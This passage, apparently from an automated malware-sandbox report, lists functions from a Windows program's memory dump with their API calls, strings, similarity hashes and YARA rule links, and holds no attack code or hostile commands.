Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: ,$P$wJB
API String ID: 3227129158-3723871730
Opcode ID: 9f0278164789be7f6939b6e5caf71e56239e26051167646a4de12d032ac2057e
Instruction ID: 5224c97ccb6620e167ea4478bf89004f813c21321404a1342b3364d35cae8371
Opcode Fuzzy Hash: 9f0278164789be7f6939b6e5caf71e56239e26051167646a4de12d032ac2057e
Instruction Fuzzy Hash: 4F218B74A00118AFDB00DFA8DD85BEEB7F9EB44314FA042A5E414EB390D7799E84CB04

Uniqueness

Uniqueness Score: -1.00%

Function 004371C8, Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

FillRect.USER32 ref: 00437241
GetClientRect.USER32 ref: 0043726C
FillRect.USER32 ref: 0043728B

Part of subcall function 00437128: CallWindowProcA.USER32 ref: 00437162

BeginPaint.USER32(?,?), ref: 00437303
GetWindowRect.USER32 ref: 00437330
EndPaint.USER32(?,?,004373A4), ref: 00437390

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 5743301ef43d720497401813025421ba2cdbe37b340c94fa2c0badc731e1485f
Instruction ID: df40d588a5b9a8309b46573d491c9cdf26e293c231c015a8aa125c948c700f8c
Opcode Fuzzy Hash: 5743301ef43d720497401813025421ba2cdbe37b340c94fa2c0badc731e1485f
Instruction Fuzzy Hash: 56510D71A04108DFCB60DBA9C589E9DB7F8AF09314F5591E6F848EB352C738AE41DB14

Uniqueness

Uniqueness Score: -1.00%

Function 004A531C, Relevance: 9.1, APIs: 6, Instructions: 95filewindowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000080,00000000,004081E5,?,004A546A,Abnormal program termination,004A60A9,?,?,004082DB,?,004A547B,00000016,004A6C99), ref: 004A535B
MessageBoxA.USER32 ref: 004A53A6
GetStdHandle.KERNEL32(000000F4,00000000,004081E5,?,004A546A,Abnormal program termination,004A60A9,?,?,004082DB,?,004A547B,00000016,004A6C99,004080AA), ref: 004A53B2
WriteFile.KERNEL32(00000000,004BDBC0,00000002,004080AA,00000000,000000F4,00000000,004081E5,?,004A546A,Abnormal program termination,004A60A9,?,?,004082DB), ref: 004A53C7
WriteFile.KERNEL32(00000000,004082DB,00000000,004080AA,00000000,00000000,004BDBC0,00000002,004080AA,00000000,000000F4,00000000,004081E5,?,004A546A,Abnormal program termination), ref: 004A53DC
WriteFile.KERNEL32(00000000,004BDBC3,00000002,004080AA,00000000,00000000,004082DB,00000000,004080AA,00000000,00000000,004BDBC0,00000002,004080AA,00000000,000000F4), ref: 004A53EF

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$HandleMessageModuleName
String ID:
API String ID: 1009477876-0
Opcode ID: eeaef8193c9db33dee810b83c165d8e293268cd7fca305fa11685679cda40ac9
Instruction ID: ff9aeb9f657b490166301ffb09dc63074c67618de814b9e78ea0b2e97c773498
Opcode Fuzzy Hash: eeaef8193c9db33dee810b83c165d8e293268cd7fca305fa11685679cda40ac9
Instruction Fuzzy Hash: 99213971908700B7DB2093218D46FEB322CDB26325F5042ABF504951E2E7BC6E848B7D

Uniqueness

Uniqueness Score: -1.00%

Function 0042A380, Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0042A3D2
GetSystemMetrics.USER32 ref: 0042A3DE
GetDC.USER32(00000000), ref: 0042A3FD
GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042A424
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0042A431
ReleaseDC.USER32 ref: 0042A46F

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: 37646e8f79d5614bab0e542ebce065621d8791d5d853e22448c460e3fca41f36
Instruction ID: a979357cdcd30aa88f5f0439803b35e57f5d3b5f1063d64c00e75f4bf99b438d
Opcode Fuzzy Hash: 37646e8f79d5614bab0e542ebce065621d8791d5d853e22448c460e3fca41f36
Instruction Fuzzy Hash: 59317074A00205EFDB00EFA4D551AAEB7B5FF48300F518566FD14AB390D7B89D10CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0047C0F8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C117
GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C13B
GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,0000001C,?,0047C2D5,00000400,?,00440781), ref: 0047C156
LoadStringA.USER32 ref: 0047C20C

Strings

hG, xrefs: 0047C1F8

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID: hG
API String ID: 3990497365-2527930132
Opcode ID: 6632b916adc1cc5236ef3e86120e601dccb48048c6c38b085bf7f3e84de629a2
Instruction ID: 5164d58399a5243ed5830bbf5930c6c72f4a09fddaa9d101af25230e0d4afb00
Opcode Fuzzy Hash: 6632b916adc1cc5236ef3e86120e601dccb48048c6c38b085bf7f3e84de629a2
Instruction Fuzzy Hash: 0F51A570D002599FCB11DBA9C985BDEB7F8AB08304F5481AAE508E7351E778AF84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004533C4, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetClassInfoA.USER32 ref: 004533F7
GetClassInfoA.USER32 ref: 0045340D
GetClassInfoA.USER32 ref: 00453429
GetClassInfoA.USER32 ref: 00453444

Strings

LL, xrefs: 00453421

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassInfo
String ID: LL
API String ID: 3534257612-1275452992
Opcode ID: 44cf0c1db16466094625e010fb6a8b6003e969881560a53e4069631a10b6602f
Instruction ID: 38e8d6d8c56bae37302d74ef34b71b60f985ae060f17ff3a0407751b61126d14
Opcode Fuzzy Hash: 44cf0c1db16466094625e010fb6a8b6003e969881560a53e4069631a10b6602f
Instruction Fuzzy Hash: BA21A2B5E04208AFCB40DF9EC981A9EBBF8AF08319F0041A5E918E7311D374EA408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0043033C, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 58COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000008,00000000,00000048), ref: 00430362

Part of subcall function 004302E4: GetDC.USER32(00000000), ref: 004302F0
Part of subcall function 004302E4: SelectObject.GDI32(00000000,00000000), ref: 00430308
Part of subcall function 004302E4: GetTextMetricsA.GDI32(00000000,?), ref: 00430319
Part of subcall function 004302E4: ReleaseDC.USER32 ref: 0043032E

Strings

Tahoma, xrefs: 00430384
MS Shell Dlg 2, xrefs: 004303CC
\LG, xrefs: 00430390
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 004303B8

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText
String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma$\LG
API String ID: 2013942131-1221280657
Opcode ID: 053853572d72ccb82d158cc0f15da6322d853e88d3466308977e4186ceb0c1f3
Instruction ID: fd7eb11d9b86d32374423b150de9a7bcabc8d691b7f1674c5fd4ddf1c1d0697e
Opcode Fuzzy Hash: 053853572d72ccb82d158cc0f15da6322d853e88d3466308977e4186ceb0c1f3
Instruction Fuzzy Hash: 9811E230600208EFDB10EF69CC62AAD77B4EB49704FA195BAF90497651DB389E00DB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0043810C, Relevance: 7.7, APIs: 5, Instructions: 193windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 0043827C
SetMenu.USER32(00000000,00000000), ref: 0043829D
SetMenu.USER32(00000000,00000000), ref: 004382D9
SetMenu.USER32(00000000,00000000), ref: 004382F7

Part of subcall function 0048C72C: LoadStringA.USER32 ref: 0048C75E

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0043834D

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$LoadStringWindow
String ID:
API String ID: 1738039741-0
Opcode ID: 0aec024d2d64aa375214a83fd24f479eb252a54524a10a3bf02bd421ba0f972f
Instruction ID: d43009e3c57b2edb58823e729d3803d80fadcf199b16d986504122d2c322beb5
Opcode Fuzzy Hash: 0aec024d2d64aa375214a83fd24f479eb252a54524a10a3bf02bd421ba0f972f
Instruction Fuzzy Hash: 8981F430A04249DFDB14DBA9C985B9EB7F5BF49304F1450EAF804A7362CB78AE45DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00420094, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00420177
OffsetRect.USER32(?,00000001,00000001), ref: 004201D0
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0042021A
OffsetRect.USER32(?,000000FF,000000FF), ref: 00420227
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004202A3

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 386c4ef85e5f13a2b49c247326a713beb967259f4579f606ceb0a30aa4057521
Instruction ID: e5dbfb7e383cb037bf2436b514941d4a7ec266afbf7bb98722a63788e9e2752e
Opcode Fuzzy Hash: 386c4ef85e5f13a2b49c247326a713beb967259f4579f606ceb0a30aa4057521
Instruction Fuzzy Hash: 66714F70A00219AFDB10EFA9D885BAE7BF5AF04314F504556F814EB352C778DD40CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0043E388, Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0043E397
SetEvent.KERNEL32(00000000,00441660,?,?,00440068), ref: 0043E3B2
GetCurrentThreadId.KERNEL32 ref: 0043E3B7
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00441660,?,?,00440068), ref: 0043E3CC
CloseHandle.KERNEL32(00000000,00000000,00441660,?,?,00440068), ref: 0043E3D7

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 3bb669a847586c54bc5df3eb5086ddeb522f4d20d1bad5438e5991a532142af9
Instruction ID: e4322ec0f61ec790069834888bb6b8d106c2258c5fba04fd221f801cb111e7b3
Opcode Fuzzy Hash: 3bb669a847586c54bc5df3eb5086ddeb522f4d20d1bad5438e5991a532142af9
Instruction Fuzzy Hash: C6F0C0759012009BC750EF79EC99AB637E4670A304F545B3BBA08C32F1D67C9448CB2C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1F4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84filewindowCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 0040B211
ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 0040B27C
SendMessageA.USER32(00000000,000007E8,-00000001,00000000), ref: 0040B2E4

Strings

Closing handle failed, xrefs: 0040B220

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseFileHandleMessageReadSend
String ID: Closing handle failed
API String ID: 3286928025-3657355054
Opcode ID: 3d28668a5d065a78de98827ca645e45a211f4f1228240004167baa04dd0a5f1a
Instruction ID: a47fb473bee2114e64c53e72772d9bcae66cccda26557bcad5069e65af197879
Opcode Fuzzy Hash: 3d28668a5d065a78de98827ca645e45a211f4f1228240004167baa04dd0a5f1a
Instruction Fuzzy Hash: 20317371900148ABDF10EB91CC46BDD7379FF44304F10816BFD0866195EB799A59CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004753E4, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,7SG,7SG), ref: 00475416

Strings

7SG, xrefs: 004753F8, 00475446, 004753FB
7SG, xrefs: 004753FC, 004753FF
8ZG, xrefs: 0047542F

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: QueryValue
String ID: 7SG$7SG$8ZG
API String ID: 3660427363-1609783338
Opcode ID: cc30ff23f733c54c70f3f8b13c7b2e04248a094feb95ccc38992a79ce670414a
Instruction ID: c8d49a7841bf4e7b1c726970ba1d888512d9ac6d670407cd5fbae2060ff531dd
Opcode Fuzzy Hash: cc30ff23f733c54c70f3f8b13c7b2e04248a094feb95ccc38992a79ce670414a
Instruction Fuzzy Hash: 0811DB75D00209AFDB00DF99C981EEEB7F8AB08314F10816AF918E7351D734AA00CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00442064, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll), ref: 0044206D
GetProcAddress.KERNEL32(00000000,SetLayeredWindowAttributes), ref: 00442084

Strings

User32.dll, xrefs: 00442068
SetLayeredWindowAttributes, xrefs: 0044207B

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetLayeredWindowAttributes$User32.dll
API String ID: 1646373207-2510956139
Opcode ID: 00dbc8c46811db5178545aeadc9d927cc8a498d257a8a6df0941d0e520bba988
Instruction ID: 4145a313675efc3f926a3c3e1cb6b59db9a7b7626e66f31649a54c7cbbbdf195
Opcode Fuzzy Hash: 00dbc8c46811db5178545aeadc9d927cc8a498d257a8a6df0941d0e520bba988
Instruction Fuzzy Hash: 02D05E7090830CBFEB14EBE59A16B8EB3E8D700714FA0006BF20453190E5F92A00C66C

Uniqueness

Uniqueness Score: -1.00%

Function 0044B2F4, Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0044B379
GetDesktopWindow.USER32 ref: 0044B4C7
SetCursor.USER32(00000000), ref: 0044B527

Part of subcall function 0045A6C0: ImageList_DragMove.COMCTL32(?,?,?), ref: 0045A6F8

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: DesktopWindow$CursorDragImageList_Move
String ID:
API String ID: 590815461-0
Opcode ID: 574654af9ed55e996d8963e238d57fd112a65476162eea1a181e01d86aace0c9
Instruction ID: 8200286b38f40ee192c6f91fadf4961e6aa6eb8c7a5dbd096e759bbd9638e161
Opcode Fuzzy Hash: 574654af9ed55e996d8963e238d57fd112a65476162eea1a181e01d86aace0c9
Instruction Fuzzy Hash: 54B10B34A00245DFD704DF59D884A6DB7F1FB4A304F9482BAE8089B366D738ED49CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042D020, Relevance: 6.1, APIs: 4, Instructions: 89windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00428D7C: EnterCriticalSection.KERNEL32(004BFEC0,8B000783,?,0042CF8E), ref: 00428D88
Part of subcall function 00428D7C: LeaveCriticalSection.KERNEL32(004BFEC0,004BFEC0,8B000783,?,0042CF8E), ref: 00428D98
Part of subcall function 00428D7C: EnterCriticalSection.KERNEL32(0042CF56,004BFEC0,004BFEC0,8B000783,?,0042CF8E), ref: 00428DA4

Part of subcall function 0042E84C: GetDC.USER32(00000000), ref: 0042E8D1
Part of subcall function 0042E84C: GetDeviceCaps.GDI32(0042D120,0000000C), ref: 0042E8ED
Part of subcall function 0042E84C: GetDeviceCaps.GDI32(0042D120,0000000E), ref: 0042E8FA
Part of subcall function 0042E84C: CreateHalftonePalette.GDI32(0042D120,00000000), ref: 0042E92F
Part of subcall function 0042E84C: ReleaseDC.USER32 ref: 0042E940

CreateCompatibleDC.GDI32(00000000), ref: 0042D075
SelectObject.GDI32(00000000,00000000), ref: 0042D09D
SelectPalette.GDI32(00000000,00000000,000000FF), ref: 0042D0D4
RealizePalette.GDI32(00000000), ref: 0042D0E3

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: 039b18e0910b54a9859c3fea054287d25de1763ab28fcbff6da1f9298b0042b6
Instruction ID: bd0b5fe7ffb54c1de3ef4836ab7a4471aa0c0cee36f4c66542af882900581ed6
Opcode Fuzzy Hash: 039b18e0910b54a9859c3fea054287d25de1763ab28fcbff6da1f9298b0042b6
Instruction Fuzzy Hash: DF31B174A04658EFCB04EF99D985E8DB3F5EF48314BA141A6E8049B372C738EE81DB14

Uniqueness

Uniqueness Score: -1.00%

Function 004A5238, Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,004BDD40,004082DB,004081E5,004082DB,?,004A542E,00000000,004082DB,00000000), ref: 004A5258
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080,00000000,004BDD40,004082DB,004081E5,004082DB), ref: 004A527C
WriteFile.KERNEL32(00000000,004080AA,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002,00000080), ref: 004A5291
CloseHandle.KERNEL32(00000000,00000000,004080AA,00000000,?,00000000,00000000,00000000,00000000,?,00000000,?,C0000000,00000000,00000000,00000002), ref: 004A5297

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Write$CloseCreateHandle
String ID:
API String ID: 148219782-0
Opcode ID: 620ffa3dd92774fab1f750cdf6aaebc79f19b7e1a355d2a609d8240a647afea3
Instruction ID: 955bdc0265fa2eedbbed80bf9dda9be46ab68d9d2c04bd23e3fac71b30481071
Opcode Fuzzy Hash: 620ffa3dd92774fab1f750cdf6aaebc79f19b7e1a355d2a609d8240a647afea3
Instruction Fuzzy Hash: 55F0627664030479F610A1629D47FFF2B6CCB81768F50401BF600AA192D9A8AD0142BC

Uniqueness

Uniqueness Score: -1.00%

Function 0044B0AC, Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000,0044B14B), ref: 0044B0C7
GetCurrentProcessId.KERNEL32(00000000,0044B14B), ref: 0044B0D0
GlobalFindAtomA.KERNEL32 ref: 0044B0E5
GetPropA.USER32 ref: 0044B0FF

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 3684e0837a211cd35cd5d46824bc86fe0936b7ab7759f030dd7df1ab0324b782
Instruction ID: 1b72be548f7df1a3c4116a349fe78bb516e6e3292d88aa8aed2df17e97efce98
Opcode Fuzzy Hash: 3684e0837a211cd35cd5d46824bc86fe0936b7ab7759f030dd7df1ab0324b782
Instruction Fuzzy Hash: 7001A220805148A6DF10EBB9CD52AEE77B89B09345F0441A7F954D3352D778DE01D769

Uniqueness

Uniqueness Score: -1.00%

Function 0043E30C, Relevance: 6.0, APIs: 4, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0043E327
SetWindowsHookExA.USER32 ref: 0043E337
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,00441C9C), ref: 0043E352
CreateThread.KERNEL32 ref: 0043E379

Memory Dump Source

Source File: 00000000.00000002.260479331.0000000000404000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260461777.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.260466597.0000000000401000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.260471558.0000000000402000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.260566364.00000000004B3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.260572139.00000000004B4000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.260587546.00000000004CA000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: ed9b68ed5ed75a1b81debdcc59b69b0c4f5fe9a0a738858b9e5bde0c70b20c25
Instruction ID: b752e9815170b47d4b0725ccada81876270e7d0bacfe15456893760281dfcb6d
Opcode Fuzzy Hash: ed9b68ed5ed75a1b81debdcc59b69b0c4f5fe9a0a738858b9e5bde0c70b20c25
